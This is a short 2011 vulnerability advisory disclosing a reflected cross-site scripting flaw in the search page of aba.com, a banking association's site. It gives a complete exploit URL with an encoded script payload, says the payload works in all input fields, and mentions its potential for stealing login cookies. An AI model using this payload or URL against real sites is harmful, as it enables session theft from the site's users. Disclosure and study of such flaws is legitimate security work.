########################################################
| Title  : American Bankers Association(aba.com) XSS
| Author : Codeine
| Email  : f3codeine[at]yahoo[dot]com
| Site   : http://infosecforums.com/
| Date   : 08/09/2011
| Cat    : PHP[XSS]
| URL    : http://aba.com/
########################################################

American Bankers Association uses a search script provided by "xSynthesis Search". After checking no current version by them is vulnerable.
Since aba.com allows users to login, this vulnerability presents a great security risk regarding cookie logging.
This is not persistent but still provides a area a risk.

[*]XSS Vulnerability
	http://www.aba.com/Search2/searchaba.aspx?xr=t&adv=t&PageSize=10&MaxPages=200&SearchKind=ExactPhrase&SearchPhrase=%3Cscript%3Ealert%28%27CodeineXSS%27%29%3B%3C%2Fscript%3E
	I used <script>alert('CodeineXSS');</script> works in all of the input feilds.
______________________________________________________________________________________
Greetz Hidden Ninja